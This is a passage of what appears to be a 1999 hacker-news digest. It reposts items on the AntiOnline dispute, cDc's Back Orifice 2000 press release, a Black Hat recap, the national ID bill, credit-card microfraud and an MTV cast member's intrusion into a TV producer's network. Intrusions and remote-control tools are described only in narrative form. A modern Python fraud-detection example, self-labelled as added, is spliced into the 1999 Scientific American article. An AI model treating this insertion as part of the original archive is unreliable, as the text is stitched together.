Mr. Vranesevich's message concluded with a note to the thousands of hackers who read his site: "You yell and scream about freedom of speech, yet you destroy sites which have information that disagree with your opinions. You yell and scream about privacy, yet you install trojans into others' systems, and read their personal email and files. You truly are hypocrites. All of these grand manifestos that you develop are little more than excuses that you make up to justify your actions to yourself."

Mr. Martin, on the other hand, alleges that many of the reports from AntiOnline, and subsequent follow-on reporting in other media outlets, have been exaggerated and sensationalized. "Not only had AntiOnline driven the media hype behind the stories, they put various government and Department of Defense organizations on full alert preparing for the fallout these attacks would cause," he states on his own Web site.

In detailing the relationship between Mr. Vranesevich and the alleged hacker in question, Mr.
Martin notes that "the typical journalist/contact relationship did not exist, and in fact, AntiOnline may have been responsible for creating some of the news to report on ... he pays people to break into sites in order to report on it as an exclusive."

@HWA

16.0 Parse Defcon Video Available
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Ryan
     Parse has posted several video clips of Defcon as well as interviews with some of the luminaries present.

     Biztech TV
     http://biztechtv.com/admin/parse/defcon.asp

@HWA

17.0 cDc Challenges Microsoft to Recall SMS (wicked!)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by omega
     The cDc, writers of BO2K, have publicly challenged Microsoft to voluntarily recall all copies of its Systems Management Server network software and have requested the AV industry to respond with signature scanning for SMS files. The premise for this challenge is that Microsoft has labeled Back Orifice 2000 a malicious tool. cDc claims that if BO2K is malicious then SMS must also be, by definition, malicious. Both programs do the exact same thing and have almost identical feature sets.

     The Cult of the Dead Cow
     http://www.cultdeadcow.com/news/pr19990719.html

______________________________________________________________________
                                  _   _
      BACK ORIFICE 2000          ((___))          BACK ORIFICE 2000
      show some control          [ x x ]          show some control
                                  \   /
                                  (' ')
                                   (U)
________________________   http://www.bo2k.com/   ________________________

FOR IMMEDIATE RELEASE                                FOR IMMEDIATE RELEASE

Press Contact:
The Deth Vegetable
cDc Minister of Propaganda
veggie@cultdeadcow.com

DON'T WORRY WINDOWS USERS, EVERYTHING WILL BO2K

[July 19th, San Francisco] The CULT OF THE DEAD COW (cDc) publicly challenges Microsoft Corporation to voluntarily recall all copies of its Systems Management Server network software. In addition, cDc calls for the antivirus industry to respond with signature scanning for SMS files.
"Hypocrisy" is such an ugly word. So instead, why don't we just chalk this one up to Do-What-We-Say-Not-What-We-Do?

Microsoft evidently dislikes our new tool so much that they've taken to complaining about one of its key features. We're talking about Back Orifice 2000, and the feature in question is its stealth mode. Microsoft has claimed that BO2K is a malicious tool with no legitimate use. Their primary evidence is BO2K's stealth feature, which gives you the option to run the server on the remote machine without it being evident to anybody sitting at that machine. In fact, here's what they're saying right now on the Microsoft Security Advisor website:

     BO2K is a program that, when installed on a Windows computer, allows the computer to be remotely controlled by another user. Remote control software is not malicious in and of itself; in fact, legitimate remote control software packages are available for use by system administrators. What is different about BO2K is that it is intended to be used for malicious purposes, and includes stealth behavior that has no purpose other than to make it difficult to detect.

     http://www.microsoft.com/security/bulletins/bo2k.asp

Now, we concede that on its face, this sounds like a valid criticism. Being able to operate a remote admin tool without the person at the other end knowing that it's running on the machine seems downright devious. (Keep in mind that BO2K's stealth feature is an OPTION, which is in fact disabled by default.) Maybe Microsoft is right; perhaps this stealth feature in and of itself is enough to brand it a hacker tool with no redeeming social value.

But then, what are we to make of Systems Management Server (SMS)? SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly identical stealth feature.
As a matter of fact, they explain this feature in a Word document available from the Microsoft website:

     "Security

     Of all the operations that Systems Management Server allows you to do on a client, remote control is possibly the most "dangerous" in terms of security. Once an administrator is remote controlling a client, he has as many rights and access to that machine as if he were sitting at it. Added to this, there is also the possibility of carrying out a remote control session without the user at the client being aware of it. Thus, it is important to understand the different security options available and also to understand the legal implications of using some of them in certain jurisdictions."

     "Visible and Audible Indicators

     It is possible to configure a remote control from a state where there is never any visible or audible indication that a remote control session is under way. It has been made this flexible due to customer demands ranging from one end of this spectrum to the other. When configuring the options available in the Remote Tools Client Agent properties, due notice must also be taken of company policy and local laws about what level of unannounced and unacknowledged intrusion is permitted."

     http://www.microsoft.com/smsmgmt/techdetails/remote.asp

Notice that? Microsoft's own tool has the same evil capability as BO2K. Now, Microsoft did not invent surreptitious desktop surveillance; there are other products on the market that perform these functions. Microsoft is just the largest supplier of the technology, as SMS comes bundled with each copy of Back Office. Why is it that Microsoft can offer a tool having this illegitimate functionality without any moral qualms, but when WE do it, they throw a hissy fit?

Well... we have a hunch.

"Microsoft wants to keep everybody talking about the evil software from us crazy computer hackers. So they paint BO2K as a dangerous application with no constructive uses," says Reid Fleming (cDc). "We beg to differ."
BO2K doesn't exploit any bugs in the Windows operating system that Microsoft is willing to categorize as such. So in order to convince the public that BO2K is a solely destructive tool, Microsoft is forced to criticize the tool's feature set. Evidently whoever dreamed up this press strategy was unaware of Systems Management Server and its stealth feature.

Of course, there's another possibility. Microsoft sells SMS for cash money. Meanwhile, BO2K is free. (It's also open source, and better constructed any way you measure it: size, efficiency, functionality, security.) Maybe this is just another example of Microsoft's alleged anticompetitiveness?

"BO2K, like SMS, is a powerful software tool. Like any powerful tool, it can be used either responsibly or irresponsibly," says Count Zero (cDc). "For Microsoft to claim that BO2K has no legitimate purpose is ridiculous. Their own SMS tool has nearly the same functionality as BO2K, and Microsoft is happy to let you pay $1,000+ for it."

Regardless of their motivations, Microsoft is selling software which does many of the same things as Back Orifice 2000, including the pernicious ability to run hidden from the user. And if stealth mode is what makes BO2K a malicious program, then Microsoft's Systems Management Server is a malicious program too.

Consequently, we challenge Microsoft to recall all copies of the SMS administration tool, because its feature set contains stealth capability. This feature clearly illustrates that their software has no legitimate use. Furthermore, we urge all antivirus vendors to include signatures for SMS in their scanner utilities.

Back Orifice 2000 is available for download free of charge from http://www.bo2k.com/.

..........................................................................
APPENDIX

Equally hypocritical quotes from Microsoft about Back Orifice:

"Users who are tricked into getting this thing installed on their system are vulnerable to the attacker, who can then do anything that the victim can do -- move the mouse, open files, run programs, etc. -- which is little different from what legitimate remote-control software can do. Back Orifice, however, is designed to be stealthy and evade detection by the user."

"In fact, it really ends up doing bad things -- that’s what a Trojan horse does. Back Orifice falls into that category because it is intentionally designed to hide itself from detection. The creators claim that this is a useful administration tool, but it doesn’t even prompt people when it installs itself on the system. It doesn’t warn them that it’s getting installed. And, once it’s installed, it makes the system available to other people on the Internet. That is a malicious act."

"It’s incomprehensible why a tool like this would be created. [...] [T]here’s no purpose for this tool other than harming actual users of software products."

-- Jason Garms, lead product manager for Windows NT security
   Microsoft's prefabricated interview, 8-July-1999

..........................................................................

The CULT OF THE DEAD COW (cDc) is the most influential group of hackers in the world. Formed in 1984, the cDc has published the longest running e-zine on the Internet, swallowed swords, made waffles, and so on. For more background information, journalists are invited to check out our Medialist at http://www.cultdeadcow.com/news/medialist.htm. Cheerio.

"Microsoft", "Windows", "Systems Management Server", "Word", and "Back Office" are all trademarks of the Microsoft Corporation. Blah blah blah, this is giving me a headache.

"cDc. It's alla'bout style, jackass."
@HWA

18.0 BlackHat Insiders Want to Quit Security Biz
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Code Kid
     While Defcon made it into the popular press and gathered all the attention, The BlackHat Briefings is where a lot of the security industry traded secrets. Infoworld's Stuart McClure and Joel Scambray give a pretty good overview of the goings on at the conference and describe a growing sentiment within the industry that you can't secure the world.

     InfoWorld
     http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/29/o03-29.44.htm

July 19, 1999 (Vol. 21, Issue 29)

SECURITY WATCH
BY STUART McCLURE & JOEL SCAMBRAY

Black Hat conference survives a denial-of-service attack, but will it outlast attrition?

The Security Watch team writes to you this week from the ever-expanding concrete facades of Las Vegas, where we were in attendance at the third annual Black Hat Briefings USA conference from July 7 through July 8.

The original concept behind the Black Hat conference was to "meet the enemy," where corporate types could rub elbows with the glitterati of the hacker set, including such notables as Simple Nomad of the Nomad Mobile Research Center (www.nmrc.org) and Dr. Mudge of L0pht (www.l0pht.com). The event has evolved into a general meeting of the minds among security practitioners of all types, from public-sector managers to professional consultants.

Our feelings can best be summed up by the offhand comment of Windows NT security guru Dominique Brezinski, in his talk at the finale of the first day of presentations: "My life is miserable and pathetic, and I want to get out of security soon."

Although the remark was mostly intended as a self-deprecating jest, it reflected the undercurrent of frustration that many speakers echoed throughout the conference: Despite all of the work being done in the security field, the same old problems never seem to get solved.
These recurring issues include the endemic lack of security expertise in the market today, the Achilles' heel of poor password choices, and an ever-expanding list of commercial software bugs that are becoming impossible to fix. Despite the formidable intellectual talent assembled at Black Hat, the general response to some of these problems is to throw up the hands and say, "I give up."

For example, Brezinski gave a fascinating discussion of the implications of NT and Solaris' shared-code search path for creating a trusted forensic toolkit CD-ROM, but he concluded his talk by noting that an attacker sophisticated enough to make kernel modifications would be impossible to defeat.

Here are two other good examples: Security legend Bill Cheswick's printed materials yawned that "this security stuff is all the same. ... From a security viewpoint, there is little new about the Internet." And cryptography expert Bruce Schneier's ruminations included, "A secure computer is one that has been insured," which means you should get used to the notion that your system will be compromised.

We can understand Cheswick's sentiments, because he has been one of the leading lights in security for the past 30 years, but it was a bit troubling to hear the "next generation" of the security avant-garde openly proclaiming the need to seek more serene pastures.

Pessimism aside, there were still a great deal of interesting topics covered by the Black Hat speakers. Some highlights included Mudge's technical outline of L0pht's new program, AntiSniff, which remotely detects promiscuous-mode network interfaces, and Simple Nomad's release of Pandora 4 with a functional version of its NetWare Level 3 packet-signing exploit. Our company, Ernst & Young, gave a similar demonstration on NT of "passing the hash" to circumvent the NT challenge/response log-on. The original idea for this type of attack was proposed on NTBugtraq years ago but was never publicly proved.
And despite the gloom expressed in some of their thoughts, all of the speakers showed great patience and perseverance during the incessant testing of the Venetian hotel's fire-alarm system throughout the two-day conference. In the end, Black Hat's spirit proved resistant to this denial-of-service attempt.

Of course, a lot of the good information coming out of Black Hat doesn't appear in any official program but is gleaned in the corridors outside the conference hall during breaks in the program. We've done our best to capture the essence of Black Hat, but a lot of great dialogue was left on the cutting room floor. The next best thing to being there is purchasing the full conference, including a video of the presentations in MP3 format, at www.blackhat.com.

Meanwhile, send your thoughts on addressing security symptoms vs. problems to security_watch@infoworld.com.

Stuart McClure is a senior manager and Joel Scambray is a manager at Ernst & Young's eSecurity Solutions group. They have managed information security in academic, corporate, and government environments for the past nine years.

Copyright (c) 1999 InfoWorld Media Group Inc.

@HWA

19.0 Attrition Closes Down Negation
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Staff
     The Attrition.org staff has decided to stop updating the Negation section of their web site. The Negation section covers the activity of John Vranesevich of AntiOnline. The Attrition staff claim that they have accomplished what they set out to do, which was to prove beyond a reasonable doubt that AntiOnline and John Vranesevich are a fraud. The Attrition statement says that they have also proven John Vranesevich guilty of libel, repeated copyright violation, paying people to break into systems, idle threats to stifle competition, and serious errors in supposed "factual news". The Negation section will remain posted for all to see; it will just no longer be updated.
Negation
http://www.attrition.org/negation/

@HWA

20.0 ISS Offers Cracking Tools
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Just like any tool these have both good and bad uses. ISS has announced three prototype tools: Telephony Scanner, a wardialing program; Attacker Tracker, a log file analysis tool; and SQL Cracker, for auditing SQL passwords. Free demos are available.

ISS Protoworx
http://xforce.iss.net/protoworx/

@HWA

21.0 IBM Researching Proactive Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
The Proactive Security project at IBM is producing some interesting results. There are white papers and demos available. Definitely a site worth looking at.

IBM
http://www.hrl.il.ibm.com/proactive/ <- lots of interesting postscript papers here

22.0 InET Issue #3
~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by GothstaiN
Good news for the non-English crowd. InET Magazine issue #3 has been released and it only comes in Spanish.

Intrusos
http://www.intrusos.cjb.net

@HWA

23.0 National ID Card Law Set to be Enacted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
In an effort to fight illegal immigration US Representative Lamar Smith, from San Antonio, Texas, has proposed that your social security number and possibly microchips encoded with your fingerprints and other personal data be a mandatory part of your drivers license. At a hearing Thursday, the House Immigration subcommittee will debate the future of modified driver licenses, which has been labeled by some as a "national ID card."

Wired
http://www.wired.com/news/news/politics/story/20881.html

House Immigration subcommittee
http://www.house.gov/judiciary/sub106.htm

Your License or Your Life
by Declan McCullagh

3:00 a.m. 22.Jul.99.PDT

WASHINGTON -- If Representative Lamar Smith has his way, your driver's license will soon sport your Social Security number, whether you like it or not. It may also include microchips encoded with your fingerprints and other personal data. Government agencies will no longer accept as identification licenses that don't meet the new standards.

Smith, a Republican from San Antonio, is firmly convinced the new features will reduce immigration. Not only is he doggedly opposed to illegal immigration, he wants to reduce legal immigration, insisting that low-skilled workers compete with US citizens for entry-level jobs.

See also: Your Driver License, For Sale?
http://redirect.wired.com/redir/10025/http://www.wired.com/news/news/politics/story/20435.html

At a hearing Thursday, the House Immigration subcommittee will debate the future of modified driver licenses, which detractors derisively call a "national ID card." Since Smith heads the subcommittee, his opponents have had an uphill battle.

Making their fight even more difficult is the fact that Congress approved the new license rules in 1996. Civil liberties and privacy groups are doggedly attempting to repeal the law before it takes effect next year. So far, they've had little success.

It's true that in 1998 they managed to get the Transportation Department to delay following through on regulations for a year. But that temporary setback expires in October 1999. They had no luck in inserting a flat-out repeal in a transportation spending bill last month.

"We're urging Congress to reverse course on national IDs," said Greg Nojeim, legislative counsel for the American Civil Liberties Union. "Too many proposals to combat illegal immigration instead limit the rights and freedoms of Americans. We don't need a national ID card to be the legacy of efforts to keep undocumented people from working."

The ACLU is part of a coalition with other liberal groups, such as the Electronic Frontier Foundation and Electronic Privacy Information Center. But the alliance also includes arch-conservative organizations: the Eagle Forum, the Free Congress Foundation, and Americans for Tax Reform. The organizations found common ground in what they uniformly believe is a serious threat to privacy.

"Proposals for a national ID have been consistently rejected in the United States as an infringement of personal liberty," said a recent coalition letter urging Congress to nix the current law.

"We care about this hearing because there are other members that are receptive to privacy concerns. While Lamar Smith is on the other side, other members need to hear what's going on," said Lori Cole, a spokesman for the Eagle Forum's office in Washington.

For his part, Smith angrily denies that he's Big Brother incarnate in a note he posted on his Web site: "I do not support a national ID card and don't know anyone who does."

In response to the 1996 law that requires "security features" in licenses, the Department of Transportation in June 1998 proposed that states must encode SSNs (and possibly digitized fingerprints) onto drivers licenses. After October 2000, the feds will require these new licenses if people want to use any government service, board an airplane, be eligible for Medicare -- in other words, live a normal life and do the everyday things most Americans take for granted.

The DOT will be allowed to proceed in October 1999, unless Congress acts.

"The states are concerned that they will be legally obligated to encode information in drivers licenses and collect Social Security numbers," says one Hill source. The National Conference of State Legislators and the National Association of Counties have joined the coalition. They sent a letter to House Speaker Dennis Hastert on 30 June urging Congress to repeal Section 656 of the Illegal Immigration Reform and Immigrant Responsibilities Act of 1996.

Another letter signed by six Congressmen urges colleagues to support a repeal measure -- the Privacy Protection Act -- introduced by Representative Ron Paul (R-Texas).

@HWA

24.0 Local Agencies Not Concerned About Computer Intrusions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Carole
A report released by the Emergency Response and Research Institute paints a disturbing picture. The report claims that many local, county and state agencies have little or no fear of illegal data access. While most respondents said that they have dealt with viruses, 30% claimed that computer tampering was of little or no concern to them. Someone needs to wake these people up.

Civic
http://www.civic.com/news/1999/july/civ-virus-7-21-99.html

Emergency Response and Research Institute
http://www.emergency.com/

Survey Finds Local Agencies Hit Hard by Viruses; Not Worried About Hacking

July 21, 1999

An overwhelming majority of local, county and state agencies have been the victims of computer viruses, but few are worried about being hacked, according to a recent survey by the Emergency Response and Research Institute, a public safety consulting group.

The ERRI report found that nearly 83 percent of 175 agencies that participated in the survey had dealt with a computer virus, indicating a possible lack of effective anti-virus software in use or unsafe computing practices by respondents.

Although 63 percent of the respondents called computer "hacking/cracking" a problem, about one-third did not view the issue as a concern at all.

"This is the first survey that we know of its kind that contacted city, county and state agencies on this issue," said Clark L. Staten, executive director of ERRI. "We would like to take it more in-depth and broaden it to be [more] statistically significant.... It's a problem that is not receiving recognition."

ERRI analysts, who received the completed surveys during May and June, also noted that more than 94 percent of those surveyed used a World Wide Web site to communicate with the public. Far fewer (59 percent) reported using e-mail to respond to public comments or complaints.

Staten would not name specific locations that participated because they had been promised anonymity, but he said most of the respondents were emergency agencies from municipalities across the United States, including fire departments, university security departments, state emergency management agencies and emergency medical services departments. Six agencies from Canada also responded, he said.

ERRI, based in Chicago, was founded to provide solutions to the emergency response and government community. More information is available at www.emergency.com.

-- Dan Caterinicchia (danc@civic.com)

@HWA

25.0 Microfraud Becomes Big Deal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Still think the Internet is a safe place to conduct business? Here is an eye-opening article that takes a look at what it calls 'microfraud': stealing a little money from a lot of people. The idea has been around for years but is only now coming to fruition with the unlimited reach and anonymity of the internet.

Scientific American
http://www.sciam.com/1999/0899issue/0899cyber.html

HOW TO STEAL MILLIONS IN CHUMP CHANGE

It used to be a joke: a computer can make a mistake in a fraction of a second that would take an army of mathematicians working with pencil and paper 100 years to make. For 900,000 people whose credit cards apparently suffered fraudulent charges in a single computer-based scam, this old saw morphed into an unpleasant reality.
The Federal Trade Commission (FTC) is trying to recover as much as $45 million from a handful of people who used modern technology to flood outdated security precautions. In late 1998 the group accounted for 4 percent of all the Visa chargebacks (in which a merchant's account is debited for the amount of a transaction) in the world. Victims did not have to use their cards on the Web to be hit with charges. They didn't even have to use their cards at all.

It would have taken about three years for a dishonest restaurant employee or store clerk working 24 hours a day just to fill out and submit the bogus transactions that FTC investigators ascribe to Kenneth H. Taves, his wife, Teresa, and their associates. The group, they say, set up a series of companies that processed Visa charges for adult Web sites and used the card numbers from those transactions plus others made up by a simple computer program to charge people for services that never existed. (At press time, Taves was in jail on contempt-of-court charges after disobeying an order to turn over records and to repatriate about $6 million from accounts in the Cayman Islands. His trial is scheduled for September 28.)

The essence of the scam was an updated version of the hoary computer-crime legend in which a clever programmer siphons fractional pennies from millions of bank accounts and ends up rich with no one the wiser. Here each fraudulent charge was typically $19.95, an amount unlikely to alarm a harried consumer who might not remember every last purchase on a statement. The transactions also clearly passed under the radar of Visa's fraud-detection algorithms. Although Visa and its member banks have been notably silent about the role of their security measures in the debacle, sources suggest that antifraud efforts have largely been geared to prevent smaller numbers of high-ticket thefts.

Indeed, the relatively small amount of each bill involved aggrieved customers in a financial catch-22: banks usually will go back only two months when reversing disputed charges, but $38.90 is comfortably less than the $50 limit above which U.S. financial institutions are required by law to compensate customers for fraudulent credit-card transactions. To make matters more difficult, Taves and his cohorts had an obvious excuse for disputed charges in the nature of the product they were selling: it was only natural, they reportedly faxed at least one bank, that people would want to disavow subscriptions to Web sites selling pornographic pictures.

Although it provided a convenient cover story, the porn connection may also have been Taves's undoing, says John G. Faughnan, a physician and software developer whose Web page is the best source of information on the scam. Many of the more than 200 victims who contacted him found their jobs or their marriages in jeopardy, so they had much more incentive to track down the perpetrator than just recovering the $20 to $100 they were bilked out of. Faughnan acknowledges that his own attempts to navigate the financial bureaucracy and get a refund cost far more than the money lost.

Specific shortcomings in credit-card-processing procedures appear to have made this scam even more effective than it might otherwise have been. The tricksters apparently concentrated their charges outside the U.S., where most banks do not verify the billing address--or in some cases even the expiration date--of the card being charged. Because there was no shipping address involved, the recurring charges were generally treated like restaurant or store transactions, in which a merchant has the buyer's card in hand and a signature on a charge slip. All the thieves needed was a valid number--not even a name.

So what does this mean for the little slabs of plastic that make our lives so much more convenient? Although the wide availability of cheap processing power has made the system vulnerable to unscrupulous merchants for a decade or more, it may be the advent of a huge array of intangible products for sale, across an essentially untraceable network, that opens the floodgates of microfraud. A 20-seat restaurant or a tiny boutique that claimed $4 million a month in business would be an obvious target for investigation. A digital storefront, in contrast, could house a dozen fast PCs delivering millions of dollars' worth of products from a locked room the size of a journalist's office, or it could conceal a ring of high-tech bandits stealing just a little money from a lot of people. Telling the difference between the two would require more scrutiny of both digital buyers and sellers, perhaps to the point of making e-commerce less ravishingly attractive than it has lately become.

Furthermore, as long as a consumer's cost in time and money for reversing a fraudulent transaction exceeds the amount to be recovered, no one in the chain of electronic commerce has a significant incentive to adopt measures (such as the long-stalled Secure Electronic Transaction standard or various forms of digital cash) that would make such scams less likely. In fact, Faughnan points out, many sellers of digital content can profit from opening their Web sites to users of false credit cards--even in the unlikely event of a chargeback, the marginal cost of the extra bits that were delivered is negligible.

Ultimately, technologists will undoubtedly introduce security countermeasures--perhaps in the form of the cryptography software that governments still seem bent on keeping away from whoever hasn't gotten around to downloading it yet. In the meantime, the ability of individual victims (on the Internet, at least) to alert thousands or millions of their peers seems to be the only game in town.
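The article's detection point, that antifraud rules tuned to catch a few high-ticket thefts never see a flood of $19.95 charges while a merchant-level chargeback ratio does, as an added Python example. This is not code from the article, from the FTC or from any card network; the merchant names, card tokens, transaction counts and the 1% chargeback threshold are all constructed assumptions for the demonstration.

```python
"""Merchant-level screening for 'microfraud': many small charges that never
trip a per-transaction high-ticket rule.  Added example on constructed data;
the thresholds are assumptions, not any card network's real rules."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Txn:
    merchant: str
    card: str          # constructed token such as "card-0042", never a real PAN
    amount: float
    charged_back: bool


def high_ticket_rule(txns, threshold=500.0):
    """Classic per-transaction rule: flag a merchant on any single charge
    above `threshold`.  Blind to a flood of $19.95 charges by construction."""
    return sorted({t.merchant for t in txns if t.amount > threshold})


def merchant_profile(txns):
    """Aggregate per merchant: count, volume, largest ticket, distinct cards
    and chargebacks.  This is the view a per-transaction rule never builds."""
    prof = defaultdict(lambda: {"n": 0, "total": 0.0, "max": 0.0,
                                "cards": set(), "cb": 0})
    for t in txns:
        p = prof[t.merchant]
        p["n"] += 1
        p["total"] += t.amount
        p["max"] = max(p["max"], t.amount)
        p["cards"].add(t.card)
        p["cb"] += int(t.charged_back)
    return prof


def microfraud_rule(txns, small_ticket=25.0, min_txns=200, max_cb_rate=0.01):
    """Flag merchants whose every charge is small, whose volume is high and
    whose chargeback rate exceeds `max_cb_rate` (1%, an assumed limit)."""
    flagged = []
    for merchant, p in merchant_profile(txns).items():
        cb_rate = p["cb"] / p["n"]
        if p["max"] <= small_ticket and p["n"] >= min_txns and cb_rate > max_cb_rate:
            flagged.append(merchant)
    return sorted(flagged)


def build_sample():
    """Constructed transactions for three merchants (not real data)."""
    txns = []
    # A bistro: 300 mid-sized tickets, a single chargeback (0.33%).
    for i in range(300):
        txns.append(Txn("corner-bistro", f"card-{i:04d}",
                        [14.50, 32.00, 58.75][i % 3], charged_back=(i == 0)))
    # An electronics store: 40 large tickets, no chargebacks.
    for i in range(40):
        txns.append(Txn("electronics-store", f"card-{1000 + i:04d}",
                        250.0 + 50.0 * i, charged_back=False))
    # The microfraud pattern: 1000 identical $19.95 charges on 1000 different
    # cards, one in twenty charged back (5%).
    for i in range(1000):
        txns.append(Txn("web-billing-co", f"card-{2000 + i:04d}",
                        19.95, charged_back=(i % 20 == 0)))
    return txns


if __name__ == "__main__":
    sample = build_sample()
    print("high-ticket rule flags:", high_ticket_rule(sample))   # electronics-store
    print("microfraud rule flags: ", microfraud_rule(sample))    # web-billing-co
    for m, p in merchant_profile(sample).items():
        print(f"{m:18s} n={p['n']:5d} total=${p['total']:9.2f} "
              f"max=${p['max']:8.2f} cards={len(p['cards']):5d} "
              f"cb_rate={p['cb'] / p['n']:.2%}")
```

The two rules disagree exactly as the article describes: the per-transaction rule fires only on the electronics store's legitimate $2,200 ticket, while the aggregate rule ignores it (only 40 transactions, none charged back) and fires on the billing company whose largest charge is $19.95 but whose chargeback rate is five times the assumed limit. In practice the distinct-card count relative to volume is a further signal, since the scam touched 900,000 cardholders rather than a loyal customer base.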
--Paul Wallich

@HWA

26.0 China Arrests One After Posting to Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue
A Chinese engineer has been arrested on charges of leaking state secrets after he posted secrets about a new warplane to an Internet bulletin board. The message he posted allegedly touched on secrets about a new fighter plane that he learned about while working at a research institute in the city of Chengdu.

Nando Times
http://www.nandotimes.com/technology/story/0,1643,72624-114802-815595-0,00.html

Chinese engineer accused of posting security secrets online

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

BEIJING (July 21, 1999 1:04 p.m. EDT http://www.nandotimes.com) - A Chinese engineer has been arrested on charges of posting secrets about a new warplane to an Internet bulletin board, a newspaper reported Wednesday.

Authorities tracked down the engineer after the article posted in May spread to other Internet sites, the state-run China Business Times reported. The newspaper identified the engineer only by his surname, Guo.

The article he published allegedly touched on secrets about a new fighter plane that he learned about while working at a research institute in the southwestern city of Chengdu, the newspaper said. The newspaper alleged that Guo posted the article to show off a specialist's knowledge of military affairs.

Prosecutors in Chengdu decided a few days ago to arrest Guo on charges of leaking state secrets, the newspaper said.

@HWA

27.0 The Truth About Abe - MTV "Punk Hacker"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by tweety
Back in February HNN asked if anyone knew anything about Abe, the "punk hacker". Well now we do. Salon Magazine has posted a rather long expose on Abe's exploits.
The article describes how he used the original Back Orifice to break into the producer's computers and then used the information he found there to not only get on the show but learn inside information about other cast members. Evidently all it takes to be an MTV 'hacker' is to use Back Orifice.

Salon
http://www.salon.com/ent/feature/1999/07/21/mtv_hacker/index.html

HNN Archive for February 11, 1999
http://www.hackernews.com/arch.html?021199

{Hacking toward Bethlehem}

Abe Ingersoll, a former punk hacker and infamous "Road Rules" cast member, reflects on his ill-fated 15 minutes.

- - - - - - - - - - - -

By Jonathan Vankin

July 21, 1999 | Abe Ingersoll is not the type to hit a lady -- even if she is kicking his ass on national television. So when a tiny woman named Gladys smacked him with a roundhouse left hook, Abe reacted stoically. The punch landed squarely on his jaw, sending him sprawling. Gladys then pounced, raining blow after blow on his back and shoulders. The entire beating unfolded before rolling MTV video cameras, for later viewing by an audience of millions. But Abe did nothing to defend himself other than ball up and yell at her to knock it off.

Abe, a compact, spiffy-looking 18-year-old, was a cast member of "Road Rules: Latin America" -- a 15-week-long installment of MTV's peripatetic spinoff from the rusty but reliable documentary show, "The Real World." (Abe's "Road Rules" episodes, which first aired earlier this year, will likely be rerun in the fall.)

When the self-professed "punk hacker kid" decided to audition for the show, it occurred to him that he might upgrade his odds of making the cast by hacking into the network of the show's production company, Bunim/Murray. He was right. Included in his haul were transcripts of previous interviews with prospective cast members, which gave him an inside track on what the producers were looking for.

"Actually it's not even hacking because it's so straightforward," Abe tells me as we sit in his Venice, Calif., apartment, several months after the fact. A well-scuffed surfboard leans against the wall beside Abe's home-built, Linux-loaded PC. "They had this information shared to the world. Anybody could just come and find it. Cheap production company, cheap T-1 connecting a LAN network to the Internet; what could possibly be at the other end of that?"

A whole mess of trouble, as it turns out. In short, Abe uncovered biographical insights on cast members from previous "Road Rules" excursions, several of whom dropped by for a "spontaneous" on-air visit during the Latin America shoot. He then used said info for nefarious purposes that inadvertently aroused the wrath of Gladys. So she beat him up. All in all, a pretty embarrassing 15 minutes of fame for a kid from Peoria.

For those not part of MTV's crucial yearning-adolescent demographic, here's the high concept behind "Road Rules": Find six attractive, outspoken, go-for-it young adults between the ages of 18 and 24, set them up inside an RV, put them on the road in an exotic locale, and then sit back and let the zaniness begin. It's so stupid it's perfect. A camera crew and production staff follow the young people around day and night, videotaping their every nervous tic, angst-ridden confessional and shouting match.

Abe's hack was a classic case of the chickens coming home to roost. Partners Jon Murray and Mary-Ellis Bunim's shows are carefully stocked with sexy, flamboyant and ever-so-slightly dysfunctional post-adolescents. The archetype is Puck from "The Real World," an abrasive loudmouth whose temporary "family" gave him the boot. The "Road Rules" producers knew they were getting another bad-boy specimen with Abe -- they even labeled him "The Bad Guy" in on-air promo spots -- but he turned out to be more trouble than they'd counted on.

"We knew we were taking a certain risk in choosing someone like Abe," says Murray, who learned of Abe's attack after the show had wrapped. "To some extent, that's what Abe is about."

"Abe has tremendous charisma and he has unique experience," adds Bunim. "When we met him, we were excited that his back story didn't duplicate anyone else's. We didn't think a whole lot about the danger of casting someone like Abe. Maybe we should have. It's unnerving to feel that completely vulnerable."

And what does Abe have to say for himself? He doesn't offer any excuses. But as we become acquainted, he does tell me that he saw "Road Rules" as an opportunity for useful peer-group therapy in the wake of his rather turbulent upbringing. The show was a means, he says, "to be reconnected with my generation."

"As we see," he now admits, "that did not happen at all."

Abe was the second-youngest of seven children -- six of them boys. Before he came along, his parents belonged to the Children of God, a roving religious cult that emerged from the Jesus People movement of the '60s. His parents deserted the sect after a few years but maintained an itinerant lifestyle. The Ingersoll clan was living in Twisp, Wash., in the basement of an Assemblies of God church, when Abe entered the world on March 19, 1980. Later, the family moved to a Mennonite commune in rural Illinois.

On "Road Rules," Abe can be heard lamenting the rigors of growing up on welfare, mostly through the late '80s and early '90s. Abe's father, Lewis Ingersoll, an affable man who laughs easily and revels in the family's lore, downplays the hardships. "These kids always emphasize things that, to me, are kind of a distortion," he says. "I had another son who went to Yale. He wrote a story that was published in the paper about him and his older brother getting in a dumpster."

